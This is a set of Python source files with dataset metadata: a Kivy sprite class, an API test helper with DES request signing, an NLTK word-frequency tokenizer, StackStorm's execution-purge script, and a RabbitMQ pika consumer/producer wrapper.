touch.ungrab(self)\n \n def setUpdateTranslate(self, bUpdate):\n self.updateTranslate = bUpdate\n \n @property\n def center(self):\n return (self.boxPos.x + self.realSize[0] * 0.5, self.boxPos.y + self.realSize[1] * 0.5)\n \n @center.setter\n def center(self, centerPos):\n self.boxPos.x = centerPos[0] - self.realSize[0] * 0.5\n self.boxPos.y = centerPos[1] - self.realSize[1] * 0.5\n \n def getPos(self):\n return (self.boxPos.x, self.boxPos.y)\n \n def setPos(self, x, y):\n self.oldPos = (self.boxPos.x, self.boxPos.y)\n self.boxPos.x = x\n self.boxPos.y = y\n \n def getDir(self):\n return normalize(self.vel)\n \n def getVelocity(self):\n return (self.vel[0], self.vel[1])\n \n def setVelocity(self, vx, vy):\n self.vel[0] = vx\n self.vel[1] = vy\n \n def getRotate(self):\n return self.boxRot.angle\n \n def setRotate(self, angle):\n self.boxRot.angle = angle\n \n def getRotateVel(self):\n return self.rotateVel\n \n def setRotateVel(self, vel):\n self.rotateVel = vel\n \n def getScale(self):\n return self.scaling\n \n def setScale(self, scale):\n self.scaling = scale\n self.realSize = mul(self.size, self.scaling)\n self.boxScale.xyz = (scale, scale, scale)\n \n def setAttached(self, isAttached):\n self.isAttached = isAttached\n \n def attach(self, child, offset = None):\n if not isinstance(child, Sprite):\n raise TypeError(\"It is not instance of Sprite\")\n if child not in self.attachOffsetList:\n child.setAttached(True)\n if offset == None:\n offset = sub(child.getPos(), self.getPos())\n self.attachOffsetList[child] = offset\n \n def detach(self, child):\n if child in self.attachOffsetList:\n child.setAttached(False)\n self.attachOffsetList.pop(child)\n \n def detach_all(self):\n while self.attachOffsetList:\n self.detach(self.attachOffsetList.keys()[0])\n \n def updateAttachObjPos(self):\n for child in self.attachOffsetList:\n child.setPos(*add(self.getPos(), self.attachOffsetList[child]))\n\n def update(self, fFrameTime):\n if self.updateTranslate and not self.isAttached:\n # set gravity\n if self.gravity != 0:\n self.vel[1] -= self.gravity * fFrameTime\n \n # adjust velocity, move\n self.oldPos = (self.boxPos.x, self.boxPos.y)\n if self.vel[0] != 0:\n self.boxPos.x += self.vel[0] * fFrameTime\n if self.vel[1] != 0:\n self.boxPos.y += self.vel[1] * fFrameTime\n \n if self.collision:\n if self.boxPos.x < self.collisionSpace[0]:\n self.boxPos.x = self.collisionSpace[0] * 2.0 - self.boxPos.x\n self.vel[0] = -self.vel[0] * self.friction\n elif self.boxPos.x > self.collisionSpace[2] - self.realSize[0]:\n self.boxPos.x = (self.collisionSpace[2] - self.realSize[0]) * 2.0 - self.boxPos.x\n self.vel[0] = -self.vel[0] * self.friction\n if self.boxPos.y < self.collisionSpace[1]:\n self.boxPos.y = self.collisionSpace[1] * 2.0 - self.boxPos.y\n self.vel[1] = -self.vel[1] * self.elastin\n if self.elastin == 0.0 or self.vel[1] > 0.0 and self.vel[1] <= abs(self.gravity * fFrameTime):\n self.vel[1] = 0.0\n self.boxPos.y = self.collisionSpace[1]\n elif self.boxPos.y > self.collisionSpace[3] - self.realSize[1]:\n self.boxPos.y = (self.collisionSpace[3] - self.realSize[1]) * 2.0 - self.boxPos.y\n self.vel[1] = -self.vel[1] * self.elastin\n \n if self.oldPos[1] == self.boxPos.y and self.vel[1] == 0.0:\n self.isGround = True\n else:\n self.isGround = False\n \n # update attach obj pos\n self.updateAttachObjPos()\n \n if self.updateRotation:\n if self.rotateVel != 0.0:\n self.boxRot.angle += self.rotateVel * fFrameTime\n \n#---------------------#\n# set global 
instance\n#---------------------#\nsetGlobalInstance()", "sub_path": "KivyProject/00_GameFrame/Sprite/Sprite.py", "file_name": "Sprite.py", "file_ext": "py", "file_size_in_byte": 8428, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "Utility.MyRoot.instance", "line_number": 21, "usage_type": "call"}, {"api_name": "Utility.MyRoot", "line_number": 21, "usage_type": "attribute"}, {"api_name": "Utility.W", "line_number": 59, "usage_type": "attribute"}, {"api_name": "Utility.H", "line_number": 59, "usage_type": "attribute"}, {"api_name": "kivy.graphics.PushMatrix", "line_number": 99, "usage_type": "call"}, {"api_name": "kivy.graphics.Translate", "line_number": 100, "usage_type": "call"}, {"api_name": "kivy.graphics.Rotate", "line_number": 101, "usage_type": "call"}, {"api_name": "kivy.graphics.Scale", "line_number": 102, "usage_type": "call"}, {"api_name": "kivy.graphics.PopMatrix", "line_number": 104, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 114, "usage_type": "call"}, {"api_name": "Utility.fFrameTime", "line_number": 139, "usage_type": "attribute"}]} +{"seq_id": "652882720", "text": "#-*- coding:utf-8 -*-\n# author:29557\n# datetime:2019/2/12 15:04\n# software: PyCharm\nimport json,requests,time,random,base64,hashlib\nfrom Public.tools import Log\nfrom pyDes import *\nfrom urllib import parse\n\nclass requerst_api:\n def __init__(self):\n self.header1 = {'Accept': '* / *',\n 'Accept - Encoding': 'gzip, deflate, br',\n 'Accept - Language': 'zh, en - US;q = 0.9, en;q = 0.8, zh - CN;q = 0.7',\n 'Connection': 'keep - alive',\n 'Content - Type': 'text/html;charset=utf-8'\n }\n self.header2 = {'content-type': 'application/x-www-form-urlencoded', 'Access-Control-Allow-Origin': '*'}\n\n def run_api(self, url, service, method='post', data='', headers=''): # 接口请求\n if type(service) is str: service = {\"service\": service}\n if 'webApi' in url:\n if any(data) and any(headers) is False:headers = self.header1\n if 'test' not in url:data = encrpyt().interfaceDes(data)\n else:\n if any(data) and any(headers) is False:headers = self.header2\n if 'test' not in url:data = encrpyt().interfaceDes(data, web_api=False)\n try:\n r = requests.request(method, url, data=data, headers=headers, params=service)\n response_code = r.status_code\n response_text1 = json.loads(r.text) # 对返回的指定字段断言,字段名取自Excel的期望2\n Log().info(' 【成功发起POST请求】 请求结果code为:%s, 请求结果字段为:%s' % (response_code, json.loads(r.text)))\n return response_code, response_text1\n except Exception as e:\n Log().error('【post请求出错】 出错原因:%s' % e)\n return {'code': 1, 'result': 'post请求出错,出错原因:%s' % e}\n\nclass encrpyt:\n def __init__(self):\n self.DELIVER_KEY = \"Jihewobox15\"\n self.DES_VI = \"98765432\"\n self.DES_KEY = \"jihexxkj\"\n self.isEncrypted = 1\n self.lang = 'zh'\n\n def interfaceDes(self, pm, web_api=True):\n timeStamp = int(time.time())\n randomNum = random.randint(100000, 999999)\n self.k = des(self.DES_KEY, CBC, self.DES_VI, pad=None, padmode=PAD_PKCS5) # DES加密方法\n EncryptStr = self.k.encrypt(pm.encode('gbk'))\n params = base64.b64encode(EncryptStr).decode() # 字节转换为字符串\n if web_api is True:params = parse.quote(params)\n sign = str(params) + str(self.isEncrypted) + str(timeStamp) + str(randomNum) + hashlib.md5(\n self.DELIVER_KEY.encode(encoding='UTF-8')).hexdigest()\n sign = hashlib.md5(sign.encode(encoding='UTF-8')).hexdigest()\n params = {\"timeStamp\": timeStamp, \"randomNum\": randomNum, \"isEncrypted\": self.isEncrypted, \"sign\": sign,\n \"params\": 
params, \"lang\": self.lang}\n return params\n\n def passwordDes(self, ps): # 密码加密\n EncryptStr = self.k.encrypt(ps)\n params = base64.b64encode(EncryptStr).decode() # 字节转换为字符串\n return params\n\nclass data_process:\n def excel_process(self, data):\n try:\n b = type(data)\n if b is str:\n if not data.strip():\n Log().info('测试预期值为空,请填写!')\n return None\n else:\n data = eval(data)\n b = type(data)\n if b is float:data = int(data)\n except:data = data\n return data", "sub_path": "Public/run_test_data.py", "file_name": "run_test_data.py", "file_ext": "py", "file_size_in_byte": 3570, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "requests.request", "line_number": 29, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 31, "usage_type": "call"}, {"api_name": "Public.tools.Log", "line_number": 32, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 32, "usage_type": "call"}, {"api_name": "Public.tools.Log", "line_number": 35, "usage_type": "call"}, {"api_name": "time.time", "line_number": 47, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 48, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 51, "usage_type": "call"}, {"api_name": "urllib.parse.quote", "line_number": 52, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 52, "usage_type": "name"}, {"api_name": "hashlib.md5", "line_number": 53, "usage_type": "call"}, {"api_name": "hashlib.md5", "line_number": 55, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 62, "usage_type": "call"}, {"api_name": "Public.tools.Log", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "70179584", "text": "# Part A\n\nimport re # Regex\nimport sys # Gets commands line args\nimport os # Testing file paths\nimport operator # Used for sorting dictionaries\n\nfrom nltk.stem import PorterStemmer\n\ncommonList = [\"a\", \"about\", \"above\", \"after\", \"again\", \"against\",\n \"all\", \"am\", \"an\", \"and\", \"any\", \"are\",\n \"arent\", \"as\", \"at\", \"be\", \"because\", \"been\",\n \"before\", \"being\", \"below\", \"between\", \"both\", \"but\",\n \"by\", \"cant\", \"cannot\", \"could\", \"couldnt\", \"did\",\n \"didnt\", \"do\", \"does\", \"doesnt\", \"doing\", \"dont\",\n \"down\", \"during\", \"each\", \"few\", \"for\", \"from\",\n \"further\", \"had\", \"hadnt\", \"has\", \"hasnt\", \"have\",\n \"havent\", \"having\", \"he\", \"hed\", \"hell\", \"hes\",\n \"her\", \"here\", \"heres\", \"hers\", \"herself\", \"him\",\n \"himself\", \"his\", \"how\", \"hows\", \"i\", \"id\",\n \"ill\", \"im\", \"ive\", \"if\", \"in\", \"into\",\n \"is\", \"isnt\", \"it\", \"its\", \"its\", \"itself\",\n \"lets\", \"me\", \"more\", \"most\", \"mustnt\", \"my\",\n \"myself\", \"no\", \"nor\", \"not\", \"of\", \"off\",\n \"on\", \"once\", \"only\", \"or\", \"other\", \"ought\",\n \"our\", \"ours\tourselves\", \"out\", \"over\", \"own\", \"same\",\n \"shant\", \"she\", \"shed\", \"shell\", \"shes\", \"should\",\n \"shouldnt\", \"so\", \"some\", \"such\", \"than\", \"that\",\n \"thats\", \"the\", \"their\", \"theirs\", \"them\", \"themselves\",\n \"then\", \"there\", \"theres\", \"these\", \"they\", \"theyd\",\n \"theyll\", \"theyre\", \"theyve\", \"this\", \"those\", \"through\",\n \"to\", \"too\", \"under\", \"until\", \"up\", \"very\",\n \"was\", \"wasnt\", \"we\", \"wed\", \"well\", \"were\",\n \"weve\", \"werent\", \"what\", \"whats\", \"when\",\n \"whens\", \"where\", \"wheres\", 
\"which\", \"while\", \"who\",\n \"whos\", \"whom\", \"why\", \"whys\", \"with\", \"wont\",\n \"would\", \"wouldnt\", \"you\", \"youd\", \"youll\", \"youre\",\n \"youve\", \"your\", \"yours\", \"yourself\", \"yourselves\"]\n\n\"\"\" tokenize N TIME COMPLEXITY: O(n)\nThis method reads through each word once and puts them in a list without\nrepeating.\n\"\"\"\n\n\ndef tokenize(filepath):\n tokens = []\n ps = PorterStemmer()\n if os.path.exists(filepath): # https://stackoverflow.com/questions/82831/how-do-i-check-whether-a-file-exists-without-exceptions\n with open(filepath, 'r', encoding=\"utf-8\") as f:\n try: # Catches files that can't be read\n for line in f:\n for word in line.split():\n try: # Catches words that can't be tokenized\n res = re.sub(r'[^A-Za-z0-9]', '', word) # Use regex to remove non alpha numerics\n res = res.lower()\n res = ps.stem(res)\n if res != '' and res not in commonList: # Does not allow blank tokens\n tokens.append(res)\n except: # Skips bad words\n pass\n f.close()\n except:\n print('Error: File could not be read. Please use a readable text file as input.')\n sys.exit()\n\n else:\n print('Error: File not found, please check your file parameters.')\n sys.exit()\n return tokens\n\n\n\"\"\"computeWordFrequencies N TIME COMPLEXITY: O(n)\nThis method reads through the list and logs the results in a dictionary.\nIt takes n time to read through the list and takes constant time to\nrecord the results since accessing a dictionary/adding to \nit is like a hash lookup.\n\"\"\"\n\n\ndef computeWordFrequencies(tokenList):\n myBook = {}\n for word in tokenList:\n if word in myBook:\n myBook[word] = myBook[word] + 1\n else:\n myBook[word] = 1\n return myBook\n\n\n\"\"\" print N TIME COMPLEXITY: O(n log n)\nThis method takes the contents of a dictionary and sorts them into a list of tuples\nby python's default sorting method. 
Sorting takes n log n time.\n\"\"\"\n\n\ndef aPrint(freqMap):\n dSorted = sorted(freqMap.items(), reverse=True,\n key=operator.itemgetter(1)) # https://docs.python.org/2/howto/sorting.html\n for entry in dSorted:\n print('{} => {}'.format(entry[0], entry[1]))\n\n\n# Extra functions for assignment 2\n# Takes a list strings and turns them into proper tokens\ndef simple_tokenize(tokens):\n counter = 0\n ps = PorterStemmer()\n while counter < len(tokens):\n res = re.sub(r'[^A-Za-z0-9]', '', tokens[counter]) # Use regex to remove non alpha numerics\n res = res.lower()\n res = ps.stem(res)\n if res == '' or res in commonList: # Does not allow blank tokens or common words\n tokens.pop(counter)\n else:\n tokens[counter] = res\n counter += 1\n return tokens\n\n\n# Takes a dictionary and list of words and adds to the dictionary\ndef combineFreq(tokenList, myBook):\n for word in tokenList:\n if word in myBook:\n myBook[word] = myBook[word] + 1\n else:\n myBook[word] = 1\n return myBook\n\n\n# Prints the top 50 common words from a dictionary\ndef print50(freqMap):\n \"\"\"\n given map, prints out the top 50 most frequent words\n :param freqMap: map that maps words to their frequencies\n :return: nothing\n \"\"\"\n dSorted = sorted(freqMap.items(), reverse=True,\n key=operator.itemgetter(1)) # https://docs.python.org/2/howto/sorting.html\n counter = 1\n for entry in dSorted:\n print(\"{}: {} => {}\".format(counter, entry[0], entry[1])) # Code to test number of entries\n \n # print(entry[0])\n if counter == 50:\n break\n counter += 1\n\n\n# Demo for combining multiple lists of words into 1 dictionary\nif __name__ == \"__main__\":\n bigBook = {} # Initially empty dictionary, it will store the count of all words processed\n\n list1 = ['@#%^$', 'Word', 'Words!', '沼', 'te沼st', '1991اف_جي2']\n list2 = ['wOrD', 'JeReMy', '121*@#', 'pu#$ll', '#3PuSh', 'test', 'testing']\n\n # The first list goes through simple_tokenize function to get correct tokens\n list1 = simple_tokenize(list1)\n # The list is then fed to the dictionary bigBook using the combineFreq function\n bigBook = combineFreq(list1, bigBook)\n\n # Same thing is done with second list\n list2 = simple_tokenize(list2)\n bigBook = combineFreq(list2, bigBook)\n\n # After all the lists are combined, we can print the top 50 using print50\n print50(bigBook)\n", "sub_path": "PartA.py", "file_name": "PartA.py", "file_ext": "py", "file_size_in_byte": 6523, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "nltk.stem.PorterStemmer", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 49, "usage_type": "attribute"}, {"api_name": "re.sub", "line_number": 55, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 65, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 69, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 99, "usage_type": "call"}, {"api_name": "nltk.stem.PorterStemmer", "line_number": 108, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 110, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 139, "usage_type": "call"}]} +{"seq_id": "541914460", "text": "# Licensed to the StackStorm, Inc ('StackStorm') under one or more\n# contributor license agreements. 
See the NOTICE file distributed with\n# this work for additional information regarding copyright ownership.\n# The ASF licenses this file to You under the Apache License, Version 2.0\n# (the \"License\"); you may not use this file except in compliance with\n# the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\n\"\"\"\nA utility script that purges st2 executions older than a certain\ntimestamp.\n\n*** RISK RISK RISK. You will lose data. Run at your own risk. ***\n\"\"\"\n\nimport copy\nfrom datetime import datetime\nimport pytz\n\nfrom mongoengine.errors import InvalidQueryError\nfrom oslo_config import cfg\n\nfrom st2common import config\nfrom st2common import log as logging\nfrom st2common.constants import action as action_constants\nfrom st2common.script_setup import setup as common_setup\nfrom st2common.script_setup import teardown as common_teardown\nfrom st2common.persistence.liveaction import LiveAction\nfrom st2common.persistence.execution import ActionExecution\nfrom st2common.util import isotime\n\nLOG = logging.getLogger(__name__)\n\nDONE_STATES = [action_constants.LIVEACTION_STATUS_SUCCEEDED,\n action_constants.LIVEACTION_STATUS_FAILED,\n action_constants.LIVEACTION_STATUS_TIMED_OUT,\n action_constants.LIVEACTION_STATUS_CANCELED]\n\n\ndef _do_register_cli_opts(opts, ignore_errors=False):\n for opt in opts:\n try:\n cfg.CONF.register_cli_opt(opt)\n except:\n if not ignore_errors:\n raise\n\n\ndef _register_cli_opts():\n cli_opts = [\n cfg.StrOpt('timestamp', default=None,\n help='Will delete execution and liveaction models older than ' +\n 'this UTC timestamp. ' +\n 'Example value: 2015-03-13T19:01:27.255542Z.'),\n cfg.StrOpt('action-ref', default='',\n help='action-ref to delete executions for.'),\n cfg.BoolOpt('purge-incomplete', default=False,\n help='Purge all models irrespective of their ``status``. ' +\n 'By default, only executions in completed states such as \"succeeded\", ' +\n '\"failed\", \"canceled\" and \"timed_out\" are deleted.'),\n ]\n _do_register_cli_opts(cli_opts)\n\n\ndef purge_executions(timestamp=None, action_ref=None, purge_incomplete=False):\n if not timestamp:\n LOG.error('Specify a valid timestamp to purge.')\n return 1\n\n LOG.info('Purging executions older than timestamp: %s' %\n timestamp.strftime('%Y-%m-%dT%H:%M:%S.%fZ'))\n\n filters = {}\n\n if purge_incomplete:\n filters['start_timestamp__lt'] = isotime.parse(timestamp)\n else:\n filters['end_timestamp__lt'] = isotime.parse(timestamp)\n filters['start_timestamp__lt'] = isotime.parse(timestamp)\n filters['status'] = {\"$in\": DONE_STATES}\n\n exec_filters = copy.copy(filters)\n if action_ref:\n exec_filters['action__ref'] = action_ref\n\n liveaction_filters = copy.copy(filters)\n if action_ref:\n liveaction_filters['action'] = action_ref\n\n try:\n ActionExecution.delete_by_query(**exec_filters)\n except InvalidQueryError:\n LOG.exception('Bad query (%s) used to delete execution instances. 
' +\n 'Please contact support.', exec_filters)\n return 2\n except:\n LOG.exception('Deletion of execution models failed for query with filters: %s.',\n exec_filters)\n\n try:\n LiveAction.delete_by_query(**liveaction_filters)\n except InvalidQueryError:\n LOG.exception('Bad query (%s) used to delete liveaction instances. ' +\n 'Please contact support.', liveaction_filters)\n return 3\n except:\n LOG.exception('Deletion of liveaction models failed for query with filters: %s.',\n liveaction_filters)\n\n zombie_execution_instances = len(ActionExecution.query(**exec_filters))\n zombie_liveaction_instances = len(LiveAction.query(**liveaction_filters))\n\n if (zombie_execution_instances > 0) or (zombie_liveaction_instances > 0):\n LOG.error('Zombie execution instances left: %d.', zombie_execution_instances)\n LOG.error('Zombie liveaction instances left: %s.', zombie_liveaction_instances)\n else:\n # Print stats\n LOG.info('#### All execution models less than timestamp %s were deleted.', timestamp)\n\n\ndef main():\n _register_cli_opts()\n common_setup(config=config, setup_db=True, register_mq_exchanges=False)\n\n # Get config values\n timestamp = cfg.CONF.timestamp\n action_ref = cfg.CONF.action_ref\n purge_incomplete = cfg.CONF.purge_incomplete\n\n if not timestamp:\n LOG.error('Please supply a timestamp for purging models. Aborting.')\n return 1\n else:\n timestamp = datetime.strptime(timestamp, '%Y-%m-%dT%H:%M:%S.%fZ')\n timestamp = timestamp.replace(tzinfo=pytz.UTC)\n\n # Purge models.\n try:\n return purge_executions(timestamp=timestamp, action_ref=action_ref,\n purge_incomplete=purge_incomplete)\n finally:\n common_teardown()\n", "sub_path": "st2common/st2common/cmd/purge_executions.py", "file_name": "purge_executions.py", "file_ext": "py", "file_size_in_byte": 5561, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "st2common.log.getLogger", "line_number": 40, "usage_type": "call"}, {"api_name": "st2common.log", "line_number": 40, "usage_type": "name"}, {"api_name": "st2common.constants.action.LIVEACTION_STATUS_SUCCEEDED", "line_number": 42, "usage_type": "attribute"}, {"api_name": "st2common.constants.action", "line_number": 42, "usage_type": "name"}, {"api_name": "st2common.constants.action.LIVEACTION_STATUS_FAILED", "line_number": 43, "usage_type": "attribute"}, {"api_name": "st2common.constants.action", "line_number": 43, "usage_type": "name"}, {"api_name": "st2common.constants.action.LIVEACTION_STATUS_TIMED_OUT", "line_number": 44, "usage_type": "attribute"}, {"api_name": "st2common.constants.action", "line_number": 44, "usage_type": "name"}, {"api_name": "st2common.constants.action.LIVEACTION_STATUS_CANCELED", "line_number": 45, "usage_type": "attribute"}, {"api_name": "st2common.constants.action", "line_number": 45, "usage_type": "name"}, {"api_name": "oslo_config.cfg.CONF.register_cli_opt", "line_number": 51, "usage_type": "call"}, {"api_name": "oslo_config.cfg.CONF", "line_number": 51, "usage_type": "attribute"}, {"api_name": "oslo_config.cfg", "line_number": 51, "usage_type": "name"}, {"api_name": "oslo_config.cfg.StrOpt", "line_number": 59, "usage_type": "call"}, {"api_name": "oslo_config.cfg", "line_number": 59, "usage_type": "name"}, {"api_name": "oslo_config.cfg.StrOpt", "line_number": 63, "usage_type": "call"}, {"api_name": "oslo_config.cfg", "line_number": 63, "usage_type": "name"}, {"api_name": "oslo_config.cfg.BoolOpt", "line_number": 65, "usage_type": "call"}, {"api_name": "oslo_config.cfg", 
"line_number": 65, "usage_type": "name"}, {"api_name": "st2common.util.isotime.parse", "line_number": 84, "usage_type": "call"}, {"api_name": "st2common.util.isotime", "line_number": 84, "usage_type": "name"}, {"api_name": "st2common.util.isotime.parse", "line_number": 86, "usage_type": "call"}, {"api_name": "st2common.util.isotime", "line_number": 86, "usage_type": "name"}, {"api_name": "st2common.util.isotime.parse", "line_number": 87, "usage_type": "call"}, {"api_name": "st2common.util.isotime", "line_number": 87, "usage_type": "name"}, {"api_name": "copy.copy", "line_number": 90, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 94, "usage_type": "call"}, {"api_name": "st2common.persistence.execution.ActionExecution.delete_by_query", "line_number": 99, "usage_type": "call"}, {"api_name": "st2common.persistence.execution.ActionExecution", "line_number": 99, "usage_type": "name"}, {"api_name": "mongoengine.errors.InvalidQueryError", "line_number": 100, "usage_type": "name"}, {"api_name": "st2common.persistence.liveaction.LiveAction.delete_by_query", "line_number": 109, "usage_type": "call"}, {"api_name": "st2common.persistence.liveaction.LiveAction", "line_number": 109, "usage_type": "name"}, {"api_name": "mongoengine.errors.InvalidQueryError", "line_number": 110, "usage_type": "name"}, {"api_name": "st2common.persistence.execution.ActionExecution.query", "line_number": 118, "usage_type": "call"}, {"api_name": "st2common.persistence.execution.ActionExecution", "line_number": 118, "usage_type": "name"}, {"api_name": "st2common.persistence.liveaction.LiveAction.query", "line_number": 119, "usage_type": "call"}, {"api_name": "st2common.persistence.liveaction.LiveAction", "line_number": 119, "usage_type": "name"}, {"api_name": "st2common.script_setup.setup", "line_number": 131, "usage_type": "call"}, {"api_name": "st2common.config", "line_number": 131, "usage_type": "name"}, {"api_name": "oslo_config.cfg.CONF", "line_number": 134, "usage_type": "attribute"}, {"api_name": "oslo_config.cfg", "line_number": 134, "usage_type": "name"}, {"api_name": "oslo_config.cfg.CONF", "line_number": 135, "usage_type": "attribute"}, {"api_name": "oslo_config.cfg", "line_number": 135, "usage_type": "name"}, {"api_name": "oslo_config.cfg.CONF", "line_number": 136, "usage_type": "attribute"}, {"api_name": "oslo_config.cfg", "line_number": 136, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 142, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 142, "usage_type": "name"}, {"api_name": "pytz.UTC", "line_number": 143, "usage_type": "attribute"}, {"api_name": "st2common.script_setup.teardown", "line_number": 150, "usage_type": "call"}]} +{"seq_id": "286995643", "text": "import signal\nimport sys\nimport time\nimport pika\nimport logging\n\nlog = logging.getLogger('pikaprocess')\nFORMAT = \"[%(levelname)s - %(asctime)s - %(filename)s:%(lineno)s] %(message)s\"\nlogging.basicConfig(format=FORMAT)\n\nclass PikaChannel(object):\n def __init__(self, host, port, user, password, vhost):\n self._connection = None\n self._channel = None\n self._queues = []\n self._credentials = pika.PlainCredentials(user, password)\n self._parameters = pika.ConnectionParameters(host, port, vhost, self._credentials)\n \n def add_queue(self, **opts):\n log.info(\"Registering queue with options: {}\".format(opts))\n self._queues.append(opts)\n \n def __enter__(self):\n log.debug(\"Establishing RabbitMQ connection\")\n self._connection = 
pika.BlockingConnection(self._parameters)\n self._channel = self._connection.channel()\n for queue in self._queues:\n log.debug(\"Declaring RabbitMQ queue: {}\".format(queue))\n self._channel.queue_declare(**queue)\n return self._channel\n\n def __exit__(self, type, value, traceback):\n log.debug(\"Closing RabbitMQ connection\")\n self._connection.close()\n \n\nclass PikaProcess(object):\n def __init__(self, host, port, user, pwd, vhost,\n input_q_params, success_q_params,\n fail_q_params, sleep_time=30):\n self._current = None\n self._current_priority = 0\n self._sleep_time = sleep_time\n self._channel_manager = PikaChannel(host, port, user, pwd, vhost)\n self._input_q_params = input_q_params\n self._success_q_params = success_q_params\n self._fail_q_params = fail_q_params\n self._channel_manager.add_queue(**self._input_q_params)\n self._channel_manager.add_queue(**self._success_q_params)\n self._channel_manager.add_queue(**self._fail_q_params)\n signal.signal(signal.SIGTERM, self._signal_handler)\n signal.signal(signal.SIGINT, self._signal_handler)\n \n def _signal_handler(self, signum, frame):\n log.info(\"Signal handler called with signal {}\".format(signum))\n if self._current is not None:\n log.info(\"Returning current message, '{}', to the input queue with priority {}\".format(\n self._current, self._current_priority+1))\n self._return_to_input(self._current)\n sys.exit(0)\n \n def _get_input_message(self):\n with self._channel_manager as channel:\n method_frame, header_frame, body = channel.basic_get(queue=self._input_q_params['queue'])\n if method_frame is not None:\n if method_frame.NAME != 'Basic.GetEmpty':\n channel.basic_ack(delivery_tag=method_frame.delivery_tag)\n return method_frame, header_frame, body\n return None, None, None\n\n def _send_success_message(self, message):\n with self._channel_manager as channel:\n channel.basic_publish(exchange='', routing_key=self._success_q_params[\"queue\"], body=message,\n properties=pika.BasicProperties(delivery_mode = 2, priority=0))\n\n def _send_fail_message(self, message):\n with self._channel_manager as channel:\n channel.basic_publish(exchange='', routing_key=self._fail_q_params[\"queue\"], body=message,\n properties=pika.BasicProperties(delivery_mode = 2, priority=0))\n\n def _return_to_input(self, message):\n with self._channel_manager as channel:\n channel.basic_publish(exchange='', routing_key=self._input_q_params[\"queue\"], body=message,\n properties=pika.BasicProperties(delivery_mode = 2, priority=self._current_priority+1))\n \n def process(self, message_handler):\n while True:\n mf, hf, message = self._get_input_message()\n if message is None:\n log.info(\"No message received, going to sleep for {} seconds\".format(self._sleep_time))\n time.sleep(self._sleep_time)\n continue\n else:\n self._current = message\n self._current_priority = hf.priority\n log.info(\"Received message: '{}' with priority level {}\".format(message,hf.priority))\n try:\n log.info(\"Calling handler\")\n message_handler(message)\n except Exception as error:\n log.exception(\"Message handler failure\")\n self._send_fail_message(message)\n else:\n log.info(\"Message successfully processed\")\n self._send_success_message(message)\n finally:\n self._current = None\n self._current_priority = 0\n\ndef add_pika_process_opts(parser):\n parser.add_option('-H', '--host', dest='host', type=str,\n help='RabbitMQ host', default=\"rabbitmq-service\")\n parser.add_option('-p', '--port', dest='port', type=int,\n help='RabbitMQ port', default=5672)\n 
parser.add_option('-u', '--user', dest='user', type=str,\n help='RabbitMQ username', default=\"guest\")\n parser.add_option('-k', '--password', dest='password', type=str,\n help='RabbitMQ password', default=\"guest\")\n parser.add_option('', '--vhost', dest='vhost', type=str,\n help='RabbitMQ vhost', default=\"/\")\n parser.add_option('', '--input', dest='input_queue', type=str,\n help='Name of input queue', default=\"test-input\")\n parser.add_option('', '--success', dest='success_queue', type=str,\n help='Name of success queue', default=\"test-success\")\n parser.add_option('', '--fail', dest='fail_queue', type=str,\n help='Name of fail queue', default=\"test-fail\")\n parser.add_option('', '--sleep_time', dest='sleep_time', type=float,\n help='Time to sleep when input queue is empty',\n default=30.0)\n parser.add_option('', '--log_level',dest='log_level',type=str,\n help='Logging level for pikaprocess logger', default=\"INFO\")\n\n\nclass PikaProducer(object):\n def __init__(self, host, port, user, pwd, vhost, queue_params):\n self._channel_manager = PikaChannel(host, port, user, pwd, vhost)\n self._queue_params = queue_params\n self._channel_manager.add_queue(**self._queue_params)\n\n def publish(self, messages, priority=0):\n with self._channel_manager as channel:\n if hasattr(messages,\"__iter__\") and not isinstance(messages,(str,bytes)):\n for message in messages:\n log.info(\"Publishing message '{}' to queue '{}'\".format(message,self._queue_params[\"queue\"]))\n channel.basic_publish(exchange='', routing_key=self._queue_params[\"queue\"], body=message,\n properties=pika.BasicProperties(delivery_mode = 2, priority=priority))\n else:\n log.info(\"Publishing message '{}' to queue '{}'\".format(messages,self._queue_params[\"queue\"]))\n channel.basic_publish(exchange='', routing_key=self._queue_params[\"queue\"], body=messages,\n properties=pika.BasicProperties(delivery_mode = 2, priority=priority))\n\ndef add_pika_producer_opts(parser):\n parser.add_option('-H', '--host', dest='host', type=str,\n help='RabbitMQ host', default=\"rabbitmq-service\")\n parser.add_option('-p', '--port', dest='port', type=int,\n help='RabbitMQ port', default=5672)\n parser.add_option('-u', '--user', dest='user', type=str,\n help='RabbitMQ username', default=\"guest\")\n parser.add_option('-k', '--password', dest='password', type=str,\n help='RabbitMQ password', default=\"guest\")\n parser.add_option('', '--vhost', dest='vhost', type=str,\n help='RabbitMQ vhost', default=\"/\")\n parser.add_option('-q', '--queue', dest='queue', type=str,\n help='Name of queue to publish to', default=\"test-input\")\n parser.add_option('', '--log_level',dest='log_level',type=str,\n help='Logging level for pikaprocess 